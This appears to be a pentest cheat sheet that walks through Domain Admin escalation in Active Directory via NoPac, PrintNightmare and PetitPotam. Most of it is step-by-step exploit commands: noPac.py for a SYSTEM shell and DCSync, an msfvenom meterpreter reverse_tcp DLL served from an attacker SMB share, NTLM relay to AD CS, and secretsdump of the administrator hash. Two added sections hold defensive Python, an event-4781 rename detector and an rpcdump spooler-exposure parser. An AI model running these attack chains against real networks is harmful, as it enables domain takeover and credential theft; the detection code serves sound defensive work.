# Privilege Escalation to Domain Admin using Known Exploits

## **NoPac**

* NoPac is an intra-domain privilege escalation exploit that allows escalating privileges from any standard user to domain admin-level access.
* This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller (the attacker needs a computer account, which any user can create while `ms-DS-MachineAccountQuota` is at its default of 10).
* The flow of the attack is outlined here: [SecureWorks Blog](https://www.secureworks.com/blog/nopac-a-tale-of-two-vulnerabilities-that-could-end-in-ransomware)

**Exploiting NoPac:**

1. Get the NoPac exploit: `git clone https://github.com/Ridter/noPac.git`
2. Check if target is vulnerable: `sudo python3 scanner.py domain.name/validuser:validpassword -dc-ip 172.16.5.5 -use-ldap`
3. Get a SYSTEM shell as the built-in administrator: `sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME -shell --impersonate administrator -use-ldap`
4. Perform DCSync against the built-in administrator: `sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN.NAME/administrator`
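The rename in step 2 of the SecureWorks write-up leaves a trace: Windows logs event 4781 ("The name of an account was changed") on the domain controller whenever a sAMAccountName changes. The following detector is an added example, not code from the original page or from the noPac project; it flags the two shapes of rename that NoPac relies on (a computer account losing its trailing `$`, or a new name that collides with a DC's account name) over constructed sample records. The DC account names, the actor names and the event records are all constructed for the example; the field names follow the 4781 event data.

```python
"""Detector for NoPac-style sAMAccountName renames in event 4781 records.

Added example (not from the original page). Everything below that names a
host or a user is constructed sample data.
"""
import re

# Computer accounts that are domain controllers in the sample domain
# (assumption for the example; in practice, read them from the Domain
# Controllers OU).
DC_ACCOUNTS = {"DC01$", "DC02$"}

# Machine accounts carry a trailing '$'; user accounts do not.
COMPUTER_ACCOUNT = re.compile(r"^[^$]+\$$")


def rename_risk(old_name, new_name):
    """Classify a rename of old_name -> new_name.

    Returns a short reason when the rename matches the NoPac pattern and
    None for an ordinary rename. The DC-name collision is checked first
    because it is the stronger signal: the KDC later appends '$' to the
    renamed account and resolves it to the real DC.
    """
    dc_plain = {n.rstrip("$").upper() for n in DC_ACCOUNTS}
    if (new_name.rstrip("$").upper() in dc_plain
            and old_name.upper() != new_name.upper()):
        return "new name collides with a domain controller account"
    if COMPUTER_ACCOUNT.match(old_name) and not new_name.endswith("$"):
        return "computer account renamed without trailing '$'"
    return None


def scan_events(events):
    """Return one finding per suspicious 4781 record; other events are skipped."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4781:
            continue
        reason = rename_risk(ev["OldTargetUserName"], ev["NewTargetUserName"])
        if reason:
            findings.append({
                "actor": ev["SubjectUserName"],
                "old": ev["OldTargetUserName"],
                "new": ev["NewTargetUserName"],
                "reason": reason,
            })
    return findings


# Constructed sample records in the shape of event 4781 / 4742 event data.
SAMPLE_EVENTS = [
    # NoPac step: a freshly added workstation account renamed to the DC's name.
    {"EventID": 4781, "SubjectUserName": "jsmith",
     "OldTargetUserName": "WKSTN42$", "NewTargetUserName": "DC01"},
    # Ordinary helpdesk rename that keeps the machine-account form.
    {"EventID": 4781, "SubjectUserName": "helpdesk",
     "OldTargetUserName": "LAPTOP07$", "NewTargetUserName": "LAPTOP-07$"},
    # Computer account losing its '$' without matching a DC name.
    {"EventID": 4781, "SubjectUserName": "jsmith",
     "OldTargetUserName": "WKSTN42$", "NewTargetUserName": "WKSTN42"},
    # User account rename: not a machine account, not a DC name.
    {"EventID": 4781, "SubjectUserName": "admin",
     "OldTargetUserName": "svc_backup", "NewTargetUserName": "svc_backup2"},
    # Different event id: ignored by scan_events.
    {"EventID": 4742, "SubjectUserName": "jsmith",
     "OldTargetUserName": "WKSTN42$", "NewTargetUserName": "WKSTN42$"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['actor']}: {f['old']} -> {f['new']} ({f['reason']})")
```

The same two checks apply when the rename is read back from the attribute history rather than from the event log; what matters is that a non-admin principal renamed a machine account into the DC's namespace, which is exactly the condition the exploit script creates before requesting its ticket.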

***

## **PrintNightmare**

* Vulnerability found in the Print Spooler service that runs on all Windows operating systems that allows for privilege escalation and remote code execution.

**Exploiting PrintNightmare:**

1. Get the exploit: `git clone https://github.com/cube0x0/CVE-2021-1675.git`
2. Install cube0x0's version of impacket:

   ```
   pip3 uninstall impacket
   git clone https://github.com/cube0x0/impacket
   cd impacket
   python3 ./setup.py install
   ```
3. Check if the Windows target has MS-PAR & MS-RPRN exposed:\
   `rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'`
4. Generate a DLL payload to be used by the exploit to gain a shell session:\
   `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local-ip LPORT=anyport -f dll > backupscript.dll`
5. Create an SMB server and host a shared folder (Data) at the location of the DLL payload that the exploit will attempt to download:\
   `sudo smbserver.py -smb2support Data /path/to/backupscript.dll`
6. Run the exploit (the share name in the UNC path must match the one created in step 5):\
   `sudo python3 CVE-2021-1675.py domain.name/validusername:validpassword@DC-IP '\\attacker-ip\Data\backupscript.dll'`
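The `egrep` in step 3 only tells you that the string appears somewhere in the endpoint listing. The parser below, an added example that is neither the page's nor impacket's code, walks the listing that `rpcdump.py` prints and reports the Print Spooler interfaces (MS-RPRN and MS-PAR) together with the transports they are bound to, so that a TCP binding on a domain controller can be told apart from a local-only one. The sample listing is constructed in the layout the tool uses ("Protocol:", "Provider:", "UUID", "Bindings:" lines); that layout, the IP address and the third entry's UUID are assumptions made for the example, while the two spooler UUIDs are the published interface identifiers.

```python
"""Parse rpcdump.py-style output and report Print Spooler RPC exposure.

Added example (not from the original page). The sample text is constructed.
"""
import re

# Constructed sample in the layout rpcdump.py prints (assumption).
SAMPLE_RPCDUMP = """\
Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:172.16.5.5[49677]
          ncalrpc:[LRPC-constructed-sample]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Provider: spoolsv.exe 
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0 
Bindings: 
          ncacn_ip_tcp:172.16.5.5[49677]

Protocol: N/A 
Provider: N/A 
UUID    : 00000000-0000-0000-0000-000000000000 v1.0 
Bindings: 
          ncacn_np:\\\\DC01[\\PIPE\\constructed]
"""

# The two Print Spooler interfaces that PrintNightmare is reached through.
SPOOLER_IFACES = {"MS-RPRN", "MS-PAR"}


def parse_rpcdump(text):
    """Split the listing into one dict per endpoint entry."""
    entries, current, in_bindings = [], None, False
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("Protocol:"):
            current = {"protocol": line.split(":", 1)[1].strip(),
                       "provider": None, "uuid": None, "bindings": []}
            entries.append(current)
            in_bindings = False
        elif current is None:
            continue
        elif line.startswith("Provider:"):
            current["provider"] = line.split(":", 1)[1].strip()
        elif line.startswith("UUID"):
            current["uuid"] = line.split(":", 1)[1].strip()
        elif line.startswith("Bindings:"):
            in_bindings = True
        elif in_bindings and line.strip():
            # Binding lines are indented under "Bindings:" until the next entry.
            current["bindings"].append(line.strip())
    return entries


def spooler_exposure(entries):
    """Map each spooler interface present to its network (ncacn_ip_tcp) bindings.

    An interface that is listed but has only ncalrpc bindings is reachable
    locally only; an ncacn_ip_tcp binding is the remote exposure the page's
    step 3 is checking for.
    """
    exposed = {}
    for entry in entries:
        match = re.search(r"\[(MS-[A-Z]+)\]", entry["protocol"])
        if not match or match.group(1) not in SPOOLER_IFACES:
            continue
        tcp = [b for b in entry["bindings"] if b.startswith("ncacn_ip_tcp:")]
        exposed[match.group(1)] = tcp
    return exposed


if __name__ == "__main__":
    for iface, bindings in spooler_exposure(parse_rpcdump(SAMPLE_RPCDUMP)).items():
        state = "remote" if bindings else "local only"
        print(f"{iface}: {state} {bindings}")
```

On a domain controller the expected result is an empty report: the Print Spooler service should be stopped and disabled there, which removes both interfaces from the endpoint mapper and closes this path regardless of patch level.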

***

## **PetitPotam**

* PetitPotam is an LSA spoofing vulnerability that allows forcing the domain controller to authenticate against another host using NTLM over port 445.
* Combined with an NTLM relay to Active Directory Certificate Services, this attack allows an unauthenticated user to take over the domain.
* More information about PetitPotam can be found here: [DirkJanm Post](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/)

**Exploiting PetitPotam:**

1. Start an NTLM relay: `sudo ntlmrelayx.py -debug -smb2support --target http://DOMAIN/URL/to/Certificate/Authority/host --adcs --template DomainController`\
   Note: you can use [certi](https://github.com/zer1t0/certi) to find the location of the CA.
2. Get PetitPotam: `git clone https://github.com/topotam/PetitPotam.git`
3. Run PetitPotam: `python3 PetitPotam.py attacker-ip dc-ip`
4. If it worked, you will find the base64-encoded certificate for the domain controller in the NTLM relay output.
5. Request a TGT for the domain controller using the certificate: `python3 /PKINITtools/gettgtpkinit.py DOMAIN.NAME/DC-NAME\$ -pfx-base64 <base64 certificate> dc01.ccache`
6. Set the KRB5CCNAME environment variable to the previous output file: `export KRB5CCNAME=dc01.ccache`
7. Perform DCSync using (`-k`) the previous ccache file: `secretsdump.py -just-dc-user DOMAIN.NAME/administrator -k -no-pass DC-NAME.DOMAIN.NAME`
